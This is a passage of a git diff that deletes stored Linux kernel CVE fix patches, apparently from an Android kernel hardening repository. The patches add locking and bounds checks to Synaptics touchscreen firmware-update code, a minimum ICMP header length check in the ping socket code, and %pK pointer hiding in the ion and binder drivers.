NULL; -+write_config_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1999,7 +2058,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev, - return -EBUSY; - } - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = fwu_do_read_config(); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - 
dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to read config\n", -@@ -2028,7 +2091,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev, - return -EINVAL; - } - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - fwu->config_area = config_area; -+ mutex_unlock(&fwu_sysfs_mutex); - - return count; - } -@@ -2039,10 +2105,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - int retval; - unsigned long size; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - retval = kstrtoul(buf, 10, &size); - if (retval) -- return retval; -+ goto image_size_store_exit; - - fwu->image_size = size; - fwu->data_pos = 0; -@@ -2053,10 +2121,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to alloc mem for image data\n", - __func__); -- return -ENOMEM; -+ retval = -ENOMEM; - } - -- return count; -+image_size_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_block_size_show(struct device *dev, -@@ -2241,6 +2311,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work) - container_of(to_delayed_work(work), - struct synaptics_rmi4_fwu_handle, fwu_work); - -+ mutex_lock(&fwu_sysfs_mutex); -+ - if (fwu->fn_ptr->enable) - fwu->fn_ptr->enable(fwu->rmi4_data, false); - -@@ -2248,6 +2320,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work) - - if (fwu->fn_ptr->enable) - fwu->fn_ptr->enable(fwu->rmi4_data, true); -+ -+ mutex_unlock(&fwu_sysfs_mutex); - } - - static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) -@@ -2338,7 +2412,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work); - #endif - -- retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj, -+ retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj, - 
&dev_attr_data); - if (retval < 0) { - dev_err(&rmi4_data->i2c_client->dev, diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch deleted file mode 100644 index 1c473612..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch +++ /dev/null 
@@ -1,61 +0,0 @@
-From fd11eb5c433743c87bebe699604adfd7e7e805cf Mon Sep 17 00:00:00 2001
-From: Min Chong
-Date: Thu, 13 Oct 2016 09:47:01 -0700
-Subject: [PATCH] input: synaptics_dsx: add bounds checks for firmware id
-
-A series of characters between '0' and '9' with a length more than
-MAX_FIRMWARE_ID_LEN causes a heap buffer overflow. This is
-mitigated by performing a bounds check.
-
-Bug: 31911920
-Signed-off-by: Mark Salyzyn
-Signed-off-by: Min Chong
-Change-Id: Iaefe92df2610153f2d3e2caa58322ae82cb5b7c2
----
- .../touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c | 13 +++++++++----
- 1 file changed, 9 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 908693bd26a43..ff82a4f3a55e8 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -16,6 +16,7 @@
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- */
-+#include
- #include
- #include
- #include
-@@ -2154,15 +2155,15 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd)
- static int fwu_get_image_firmware_id(unsigned int *fw_id)
- {
- int retval;
-- unsigned char index = 0;
-- char *strptr;
- char *firmware_id;
- struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-
- if (fwu->img.contains_firmware_id) {
- *fw_id = fwu->img.firmware_id;
- } else {
-- strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+ size_t index, max_index;
-+ unsigned char *strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+
- if (!strptr) {
- dev_err(rmi4_data->pdev->dev.parent,
- "%s: No valid PR number (PRxxxxxxx) "
-@@ -2179,7 +2180,11 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id)
- __func__);
- return -ENOMEM;
- }
-- while (strptr[index] >= '0' && strptr[index] <= '9') {
-+
-+ max_index = min((ptrdiff_t)(MAX_FIRMWARE_ID_LEN - 1),
-+ &fwu->image_name[MAX_IMAGE_NAME_LEN] - strptr);
-+ index = 0;
-+ while (index < max_index && isdigit(strptr[index])) {
- firmware_id[index] = strptr[index];
- index++;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch
deleted file mode 100644
index a3dbbc01..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0003.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 8a950b2d64cec7b8022b7572c2d3d9221b2dbab2 Mon Sep 17 00:00:00 2001
-From: Min Chong
-Date: Thu, 13 Oct 2016 09:53:23 -0700
-Subject: [PATCH] input: synaptics_dsx: add bounds checks for firmware id
-
-A series of characters between '0' and '9' with a length more than
-MAX_FIRMWARE_ID_LEN causes a heap buffer overflow. This is
-mitigated by performing a bounds check.
-
-Bug: 31911920
-Signed-off-by: Mark Salyzyn
-Signed-off-by: Min Chong
-Change-Id: Iaefe92df2610153f2d3e2caa58322ae82cb5b7c2
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index af6f92553aa7e..05f13b427739b 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-@@ -30,7 +30,7 @@
- * TOTAL CUMULATIVE LIABILITY TO ANY PARTY SHALL NOT EXCEED ONE HUNDRED U.S.
- * DOLLARS.
- */
--
-+#include
- #include
- #include
- #include
-@@ -2508,15 +2508,15 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd)
- static int fwu_get_image_firmware_id(unsigned int *fw_id)
- {
- int retval;
-- unsigned char index = 0;
-- char *strptr;
- char *firmware_id;
- struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-
- if (fwu->img.contains_firmware_id) {
- *fw_id = fwu->img.firmware_id;
- } else {
-- strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+ size_t index, max_index;
-+ unsigned char *strptr = strnstr(fwu->image_name, "PR", MAX_IMAGE_NAME_LEN);
-+
- if (!strptr) {
- dev_err(rmi4_data->pdev->dev.parent,
- "%s: No valid PR number (PRxxxxxxx) found in image file name (%s)\n",
-@@ -2532,7 +2532,11 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id)
- __func__);
- return -ENOMEM;
- }
-- while (strptr[index] >= '0' && strptr[index] <= '9') {
-+
-+ max_index = min((ptrdiff_t)(MAX_FIRMWARE_ID_LEN - 1),
-+ &fwu->image_name[MAX_IMAGE_NAME_LEN] - strptr);
-+ index = 0;
-+ while (index < max_index && isdigit(strptr[index])) {
- firmware_id[index] = strptr[index];
- index++;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch
deleted file mode 100644
index 95244d79..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8394/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 4b9ae9048d63ef9fe9f8cc9d0e33cc38148b268d Mon Sep 17 00:00:00 2001
-From: Ariel Yin
-Date: Wed, 12 Oct 2016 14:02:14 -0700
-Subject: [PATCH] input: synaptics_dsx: add checks of user input data for image
- name
-
-Add checks of the user input count to avoid possible heap overflow
-
-Signed-off-by: Min Chong
-Change-Id: I1d50a103a0abcbff5eb6bf204607170e9278dec3
-Bug: 31913197
----
- drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-index 282e06d9aabaa..1f7409efb1565 100644
---- a/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx/synaptics_dsx_fw_update.c
-@@ -1767,6 +1767,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- struct device_attribute *attr, const char *buf, size_t count)
- {
- ssize_t retval;
-+ if (!buf || count > MAX_IMAGE_NAME_LEN) {
-+ dev_err(fwu->rmi4_data->pdev->dev.parent,
-+ "%s: Failed to copy image file name\n",
-+ __func__);
-+ return -EINVAL;
-+ }
-
- if (!mutex_trylock(&dsx_fwu_sysfs_mutex))
- return -EBUSY;
diff --git a/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch
deleted file mode 100644
index 23d78a66..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8399/ANY/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 0eab121ef8750a5c8637d51534d5e9143fb0633f Mon Sep 17 00:00:00 2001
-From: Kees Cook
-Date: Mon, 5 Dec 2016 10:34:38 -0800
-Subject: net: ping: check minimum size on ICMP header length
-
-Prior to commit c0371da6047a ("put iov_iter into msghdr") in v3.19, there
-was no check that the iovec contained enough bytes for an ICMP header,
-and the read loop would walk across neighboring stack contents. Since the
-iov_iter conversion, bad arguments are noticed, but the returned error is
-EFAULT. Returning EINVAL is a clearer error and also solves the problem
-prior to v3.19.
-
-This was found using trinity with KASAN on v3.18:
-
-BUG: KASAN: stack-out-of-bounds in memcpy_fromiovec+0x60/0x114 at addr ffffffc071077da0
-Read of size 8 by task trinity-c2/9623
-page:ffffffbe034b9a08 count:0 mapcount:0 mapping: (null) index:0x0
-flags: 0x0()
-page dumped because: kasan: bad access detected
-CPU: 0 PID: 9623 Comm: trinity-c2 Tainted: G BU 3.18.0-dirty #15
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[] dump_backtrace+0x0/0x1ac arch/arm64/kernel/traps.c:90
-[] show_stack+0x10/0x1c arch/arm64/kernel/traps.c:171
-[< inline >] __dump_stack lib/dump_stack.c:15
-[] dump_stack+0x7c/0xd0 lib/dump_stack.c:50
-[< inline >] print_address_description mm/kasan/report.c:147
-[< inline >] kasan_report_error mm/kasan/report.c:236
-[] kasan_report+0x380/0x4b8 mm/kasan/report.c:259
-[< inline >] check_memory_region mm/kasan/kasan.c:264
-[] __asan_load8+0x20/0x70 mm/kasan/kasan.c:507
-[] memcpy_fromiovec+0x5c/0x114 lib/iovec.c:15
-[< inline >] memcpy_from_msg include/linux/skbuff.h:2667
-[] ping_common_sendmsg+0x50/0x108 net/ipv4/ping.c:674
-[] ping_v4_sendmsg+0xd8/0x698 net/ipv4/ping.c:714
-[] inet_sendmsg+0xe0/0x12c net/ipv4/af_inet.c:749
-[< inline >] __sock_sendmsg_nosec net/socket.c:624
-[< inline >] __sock_sendmsg net/socket.c:632
-[] sock_sendmsg+0x124/0x164 net/socket.c:643
-[< inline >] SYSC_sendto net/socket.c:1797
-[] SyS_sendto+0x178/0x1d8 net/socket.c:1761
-
-CVE-2016-8399
-
-Reported-by: Qidan He
-Fixes: c319b4d76b9e ("net: ipv4: add IPPROTO_ICMP socket kind")
-Cc: stable@vger.kernel.org
-Signed-off-by: Kees Cook
-Signed-off-by: David S. Miller
----
- net/ipv4/ping.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index 205e200..96b8e2b 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -657,6 +657,10 @@ int ping_common_sendmsg(int family, struct msghdr *msg, size_t len,
- if (len > 0xFFFF)
- return -EMSGSIZE;
-
-+ /* Must have at least a full ICMP header. */
-+ if (len < icmph_len)
-+ return -EINVAL;
-+
- /*
- * Check the flags.
- */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch
deleted file mode 100644
index d04d8b5d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8401/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 44a8e527e156245eff04ff36f426cb1ba8d23e34 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Fri, 7 Oct 2016 11:51:15 -0700
-Subject: [PATCH] ion: blacklist %p kptr_restrict
-
-Bug: 31494725
-Change-Id: I10a0c2aae883dfaa6c235c38689a704064557008
----
- drivers/staging/android/ion/ion.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index a215fd4a5c411..0a5522d308c74 100755
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -803,7 +803,7 @@ static int ion_debug_client_show(struct seq_file *s, void *unused)
- struct ion_handle *handle = rb_entry(n, struct ion_handle,
- node);
-
-- seq_printf(s, "%16.16s: %16zx : %16d : %12p",
-+ seq_printf(s, "%16.16s: %16zx : %16d : %12pK",
- handle->buffer->heap->name,
- handle->buffer->size,
- atomic_read(&handle->ref.refcount),
-@@ -1159,7 +1159,7 @@ static void ion_vm_open(struct vm_area_struct *vma)
- mutex_lock(&buffer->lock);
- list_add(&vma_list->list, &buffer->vmas);
- mutex_unlock(&buffer->lock);
-- pr_debug("%s: adding %p\n", __func__, vma);
-+ pr_debug("%s: adding %pK\n", __func__, vma);
- }
-
- static void ion_vm_close(struct vm_area_struct *vma)
-@@ -1174,7 +1174,7 @@ static void ion_vm_close(struct vm_area_struct *vma)
- continue;
- list_del(&vma_list->list);
- kfree(vma_list);
-- pr_debug("%s: deleting %p\n", __func__, vma);
-+ pr_debug("%s: deleting %pK\n", __func__, vma);
- break;
- }
- mutex_unlock(&buffer->lock);
diff --git a/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch
deleted file mode 100644
index d91bcad3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8402/3.10/0002.patch
+++ /dev/null
@@ -1,176 +0,0 @@ -From de51c6f363b8ba7c513e8a5bbae3459571966bfd Mon Sep 17 00:00:00 2001 -From: Nick Desaulniers -Date: Fri, 7 Oct 2016 11:13:55 -0700 -Subject: [PATCH] binder: blacklist %p kptr_restrict - -Bug: 31495231 -Change-Id: Iebc150f6bc939b56e021424ee44fb30ce8d732fd ---- - drivers/staging/android/binder.c | 36 ++++++++++++++++++------------------ - 1 file changed, 18 insertions(+), 18 deletions(-) - -diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c -index 8c9945d071476..7340ef74433a5 100644 ---- a/drivers/staging/android/binder.c -+++ b/drivers/staging/android/binder.c -@@ -534,7 +534,7 @@ static void binder_insert_free_buffer(struct binder_proc *proc, - new_buffer_size = binder_buffer_size(proc, new_buffer); - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: add free buffer, size %zd, at %p\n", -+ "%d: add free buffer, size %zd, at %pK\n", - proc->pid, new_buffer_size, new_buffer); - - while (*p) { -@@ -613,7 +613,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - struct mm_struct *mm; - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: %s pages %p-%p\n", proc->pid, -+ "%d: %s pages %pK-%pK\n", proc->pid, - allocate ? 
"allocate" : "free", start, end); - - if (end <= start) -@@ -655,7 +655,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - BUG_ON(*page); - *page = alloc_page(GFP_KERNEL | __GFP_HIGHMEM | __GFP_ZERO); - if (*page == NULL) { -- pr_err("%d: binder_alloc_buf failed for page at %p\n", -+ pr_err("%d: binder_alloc_buf failed for page at %pK\n", - proc->pid, page_addr); - goto err_alloc_page_failed; - } -@@ -664,7 +664,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - page_array_ptr = page; - ret = map_vm_area(&tmp_area, PAGE_KERNEL, &page_array_ptr); - if (ret) { -- pr_err("%d: binder_alloc_buf failed to map page at %p in kernel\n", -+ pr_err("%d: binder_alloc_buf failed to map page at %pK in kernel\n", - proc->pid, page_addr); - goto err_map_kernel_failed; - } -@@ -774,7 +774,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc, - } - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: binder_alloc_buf size %zd got buffer %p size %zd\n", -+ "%d: binder_alloc_buf size %zd got buffer %pK size %zd\n", - proc->pid, size, buffer, buffer_size); - - has_page_addr = -@@ -803,7 +803,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc, - binder_insert_free_buffer(proc, new_buffer); - } - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: binder_alloc_buf size %zd got %p\n", -+ "%d: binder_alloc_buf size %zd got %pK\n", - proc->pid, size, buffer); - buffer->data_size = data_size; - buffer->offsets_size = offsets_size; -@@ -843,7 +843,7 @@ static void binder_delete_free_buffer(struct binder_proc *proc, - if (buffer_end_page(prev) == buffer_end_page(buffer)) - free_page_end = 0; - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: merge free, buffer %p share page with %p\n", -+ "%d: merge free, buffer %pK share page with %pK\n", - proc->pid, buffer, prev); - } - -@@ -856,14 +856,14 @@ static void binder_delete_free_buffer(struct binder_proc *proc, - buffer_start_page(buffer)) - 
free_page_start = 0; - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: merge free, buffer %p share page with %p\n", -+ "%d: merge free, buffer %pK share page with %pK\n", - proc->pid, buffer, prev); - } - } - list_del(&buffer->entry); - if (free_page_start || free_page_end) { - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: merge free, buffer %p do not share page%s%s with %p or %p\n", -+ "%d: merge free, buffer %pK do not share page%s%s with %pK or %pK\n", - proc->pid, buffer, free_page_start ? "" : " end", - free_page_end ? "" : " start", prev, next); - binder_update_page_range(proc, 0, free_page_start ? -@@ -884,7 +884,7 @@ static void binder_free_buf(struct binder_proc *proc, - ALIGN(buffer->offsets_size, sizeof(void *)); - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%d: binder_free_buf %p size %zd buffer_size %zd\n", -+ "%d: binder_free_buf %pK size %zd buffer_size %zd\n", - proc->pid, buffer, size, buffer_size); - - BUG_ON(buffer->free); -@@ -1311,7 +1311,7 @@ static void binder_transaction_buffer_release(struct binder_proc *proc, - int debug_id = buffer->debug_id; - - binder_debug(BINDER_DEBUG_TRANSACTION, -- "%d buffer release %d, size %zd-%zd, failed at %p\n", -+ "%d buffer release %d, size %zd-%zd, failed at %pK\n", - proc->pid, buffer->debug_id, - buffer->data_size, buffer->offsets_size, failed_at); - -@@ -2159,7 +2159,7 @@ static int binder_thread_write(struct binder_proc *proc, - } - } - binder_debug(BINDER_DEBUG_DEAD_BINDER, -- "%d:%d BC_DEAD_BINDER_DONE %016llx found %p\n", -+ "%d:%d BC_DEAD_BINDER_DONE %016llx found %pK\n", - proc->pid, thread->pid, (u64)cookie, death); - if (death == NULL) { - binder_user_error("%d:%d BC_DEAD_BINDER_DONE %016llx not found\n", -@@ -2907,7 +2907,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma) - #ifdef CONFIG_CPU_CACHE_VIPT - if (cache_is_vipt_aliasing()) { - while (CACHE_COLOUR((vma->vm_start ^ (uint32_t)proc->buffer))) { -- pr_info("binder_mmap: %d %lx-%lx maps %p bad alignment\n", 
proc->pid, vma->vm_start, vma->vm_end, proc->buffer); -+ pr_info("binder_mmap: %d %lx-%lx maps %pK bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer); - vma->vm_start += PAGE_SIZE; - } - } -@@ -2943,7 +2943,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma) - proc->vma = vma; - proc->vma_vm_mm = vma->vm_mm; - -- /*pr_info("binder_mmap: %d %lx-%lx maps %p\n", -+ /*pr_info("binder_mmap: %d %lx-%lx maps %pK\n", - proc->pid, vma->vm_start, vma->vm_end, proc->buffer);*/ - return 0; - -@@ -3165,7 +3165,7 @@ static void binder_deferred_release(struct binder_proc *proc) - - page_addr = proc->buffer + i * PAGE_SIZE; - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "%s: %d: page %d at %p not freed\n", -+ "%s: %d: page %d at %pK not freed\n", - __func__, proc->pid, i, page_addr); - unmap_kernel_range((unsigned long)page_addr, PAGE_SIZE); - __free_page(proc->pages[i]); -@@ -3249,7 +3249,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - struct binder_transaction *t) - { - seq_printf(m, -- "%s %d: %p from %d:%d to %d:%d code %x flags %x pri %ld r%d", -+ "%s %d: %pK from %d:%d to %d:%d code %x flags %x pri %ld r%d", - prefix, t->debug_id, t, - t->from ? t->from->proc->pid : 0, - t->from ? 
t->from->pid : 0, -@@ -3263,7 +3263,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - if (t->buffer->target_node) - seq_printf(m, " node %d", - t->buffer->target_node->debug_id); -- seq_printf(m, " size %zd:%zd data %p\n", -+ seq_printf(m, " size %zd:%zd data %pK\n", - t->buffer->data_size, t->buffer->offsets_size, - t->buffer->data); - } -@@ -3271,7 +3271,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - static void print_binder_buffer(struct seq_file *m, const char *prefix, - struct binder_buffer *buffer) - { -- seq_printf(m, "%s %d: %p size %zd:%zd %s\n", -+ seq_printf(m, "%s %d: %pK size %zd:%zd %s\n", - prefix, buffer->debug_id, buffer->data, - buffer->data_size, buffer->offsets_size, - buffer->transaction ? "active" : "delivered"); diff --git a/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch deleted file mode 100644 index c8e6de21..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8402/3.4/0001.patch +++ /dev/null 
@@ -1,394 +0,0 @@ -From 8e145d45fdff30cb6471b7cc9717c30b21a0ec6b Mon Sep 17 00:00:00 2001 -From: Nick Desaulniers -Date: Thu, 16 Feb 2017 18:59:44 +0530 -Subject: binder: blacklist %p kptr_restrict - -Bug: 31495231 -Change-Id: Iebc150f6bc939b56e021424ee44fb30ce8d732fd -Git-repo: https://android.googlesource.com/kernel/msm -Git-commit: 0804d7840364fc1a93652632bd43a93c055c658e -Signed-off-by: Rahul Sharma ---- - drivers/staging/android/binder.c | 92 ++++++++++++++++++++-------------------- - 1 file changed, 46 insertions(+), 46 deletions(-) - -(limited to 'drivers') - -diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c -index 38d47e7..5ae7c13 100644 ---- a/drivers/staging/android/binder.c -+++ b/drivers/staging/android/binder.c -@@ -556,7 +556,7 @@ static void binder_insert_free_buffer(struct binder_proc *proc, - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, - "binder: %d: add free buffer, size %zd, " -- "at %p\n", proc->pid, new_buffer_size, new_buffer); -+ "at %pK\n", proc->pid, new_buffer_size, new_buffer); - - while (*p) { - parent = *p; -@@ -634,7 +634,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - struct mm_struct *mm; - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "binder: %d: %s pages %p-%p\n", proc->pid, -+ "binder: %d: %s pages %pK-%pK\n", proc->pid, - allocate ? 
"allocate" : "free", start, end); - - if (end <= start) -@@ -675,7 +675,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - *page = alloc_page(GFP_KERNEL | __GFP_HIGHMEM | __GFP_ZERO); - if (*page == NULL) { - printk(KERN_ERR "binder: %d: binder_alloc_buf failed " -- "for page at %p\n", proc->pid, page_addr); -+ "for page at %pK\n", proc->pid, page_addr); - goto err_alloc_page_failed; - } - tmp_area.addr = page_addr; -@@ -684,7 +684,7 @@ static int binder_update_page_range(struct binder_proc *proc, int allocate, - ret = map_vm_area(&tmp_area, PAGE_KERNEL, &page_array_ptr); - if (ret) { - printk(KERN_ERR "binder: %d: binder_alloc_buf failed " -- "to map page at %p in kernel\n", -+ "to map page at %pK in kernel\n", - proc->pid, page_addr); - goto err_map_kernel_failed; - } -@@ -790,7 +790,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc, - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, - "binder: %d: binder_alloc_buf size %zd got buff" -- "er %p size %zd\n", proc->pid, size, buffer, buffer_size); -+ "er %pK size %zd\n", proc->pid, size, buffer, buffer_size); - - has_page_addr = - (void *)(((uintptr_t)buffer->data + buffer_size) & PAGE_MASK); -@@ -819,7 +819,7 @@ static struct binder_buffer *binder_alloc_buf(struct binder_proc *proc, - } - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, - "binder: %d: binder_alloc_buf size %zd got " -- "%p\n", proc->pid, size, buffer); -+ "%pK\n", proc->pid, size, buffer); - buffer->data_size = data_size; - buffer->offsets_size = offsets_size; - buffer->async_transaction = is_async; -@@ -859,8 +859,8 @@ static void binder_delete_free_buffer(struct binder_proc *proc, - if (buffer_end_page(prev) == buffer_end_page(buffer)) - free_page_end = 0; - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "binder: %d: merge free, buffer %p " -- "share page with %p\n", proc->pid, buffer, prev); -+ "binder: %d: merge free, buffer %pK " -+ "share page with %pK\n", proc->pid, buffer, prev); - } - - if 
(!list_is_last(&buffer->entry, &proc->buffers)) { -@@ -873,15 +873,15 @@ static void binder_delete_free_buffer(struct binder_proc *proc, - free_page_start = 0; - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, - "binder: %d: merge free, buffer" -- " %p share page with %p\n", proc->pid, -+ " %pK share page with %pK\n", proc->pid, - buffer, prev); - } - } - list_del(&buffer->entry); - if (free_page_start || free_page_end) { - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "binder: %d: merge free, buffer %p do " -- "not share page%s%s with with %p or %p\n", -+ "binder: %d: merge free, buffer %pK do " -+ "not share page%s%s with with %pK or %pK\n", - proc->pid, buffer, free_page_start ? "" : " end", - free_page_end ? "" : " start", prev, next); - binder_update_page_range(proc, 0, free_page_start ? -@@ -902,7 +902,7 @@ static void binder_free_buf(struct binder_proc *proc, - ALIGN(buffer->offsets_size, sizeof(void *)); - - binder_debug(BINDER_DEBUG_BUFFER_ALLOC, -- "binder: %d: binder_free_buf %p size %zd buffer" -+ "binder: %d: binder_free_buf %pK size %zd buffer" - "_size %zd\n", proc->pid, buffer, size, buffer_size); - - BUG_ON(buffer->free); -@@ -999,7 +999,7 @@ static struct binder_node *binder_new_node(struct binder_proc *proc, - INIT_LIST_HEAD(&node->work.entry); - INIT_LIST_HEAD(&node->async_todo); - binder_debug(BINDER_DEBUG_INTERNAL_REFS, -- "binder: %d:%d node %d u%p c%p created\n", -+ "binder: %d:%d node %d u%pK c%pK created\n", - proc->pid, current->pid, node->debug_id, - node->ptr, node->cookie); - return node; -@@ -1335,7 +1335,7 @@ static void binder_transaction_buffer_release(struct binder_proc *proc, - int debug_id = buffer->debug_id; - - binder_debug(BINDER_DEBUG_TRANSACTION, -- "binder: %d buffer release %d, size %zd-%zd, failed at %p\n", -+ "binder: %d buffer release %d, size %zd-%zd, failed at %pK\n", - proc->pid, buffer->debug_id, - buffer->data_size, buffer->offsets_size, failed_at); - -@@ -1364,11 +1364,11 @@ static void 
